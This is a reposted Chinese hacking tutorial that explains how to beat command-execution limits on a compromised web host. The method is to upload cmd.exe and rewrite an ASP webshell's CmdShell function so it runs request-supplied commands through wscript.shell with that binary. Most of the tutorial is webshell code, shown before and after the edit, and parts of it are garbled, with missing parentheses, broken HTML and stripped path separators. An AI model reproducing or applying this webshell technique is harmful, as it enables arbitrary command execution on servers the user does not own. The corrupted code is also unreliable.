关于WEBSHELL中的命令提示符没有权限提升

touch_itpub

信息来源：hackbase.com\n\n有很多朋友问他得到了一个WEBSHELL,但是想用命令提示查看用户信息什么的,但是很多主机限制了执行命令,所以很多WEBSHELL就不能失去了很大的功能......前二天桂林老兵ASP站长助手6.0刚出来，我就以ASP站长助手6.0为例把它上传到一个禁止执行的虚拟主机，然后上传一个CMD.exe，然后调用你上传的CMD来执行命令...... \n\n本来想搞图文教程的，但感觉太简单，文字就可以说明清楚了 \n\n\n1.打开ASP站长助手6.0点击命令提示符，显示\"没有权限\" \n2.用ASP站长助手6.0上传功能上传一个CMD.exe（在WINsystem32cmd.exe）到你的WEBSHELL目录（其它目录也行，把上传以后的CMD.exe绝对路径COPY出来） \n3.修改你的webshell找到调用CMD.exe的代码 \n\n_code cellSpacing=1 cellPadding=0 width=\"90%\" border=0> Function CmdShell() \nIf Request(\"cmd\"<>\"\" Then \nDefCmd = Request(\"cmd\" \nElse \nDefCmd = \"Dir \"&Session(\"FolderPath\" \nEnd If \nSI=\" \n\" \nSI=SI&\"\" \nSI=SI&\"\" \n<br>?SI=SI&server.createobject(\"wscript.shell\".exec(\"cmd.exe /c \"&DefCmd).stdout.readall \n<br>?SI=SI&Chr(13)&\"Rar命令行压缩示例：c:progra~1winrar\rar.exe a d:web        estweb1.rar d:web        estweb1\" \nResponse.Write SI \nEnd Function \n\n修改成以下载的代码 \n\nFunction CmdShell() \nIf Request(\"cmd\"<>\"\" Then \nDefCmd = Request(\"cmd\" \nElse \nDefCmd = \"Dir \"&Session(\"FolderPath\" \nEnd If \nSI=\" \" \nSI=SI&\"\" \nSI=SI&\"\" \n<br>?SI=SI&server.createobject(\"wscript.shell\".exec(\"你想上传的cmd.exe绝对路径 /c \"&DefCmd).stdout.readall \n<br>?SI=SI&Chr(13)&\"Rar命令行压缩示例：c:progra~1winrar\rar.exe a d:web        estweb1.rar d:web        estweb1 \n\" \nResponse.Write SI \nEnd Function \n\n\n\n为了大家看得清楚把要修改的提出来就可以 \n\n原来的： \n_code cellSpacing=1 cellPadding=0 width=\"90%\" border=0> SI=SI&server.createobject(\"wscript.shell\".exec(\"cmd.exe /c \"&DefCmd).stdout.readall \n修改成： \nSI=SI&server.createobject(\"wscript.shell\".exec(\"你想上传的cmd.exe绝对路径 /c \"&DefCmd).stdout.readall \n\n\n\n比如你上伟到的目录是D:webwwwcmd.exe那么就修改成: \n_code cellSpacing=1 cellPadding=0 width=\"90%\" border=0> SI=SI&server.createobject(\"wscript.shell\").exec(\"D:webwwwcmd.exe /c \"&DefCmd).stdout.readall \n\n\n这样你的WEBSHELL中的命令提示符就可以用了......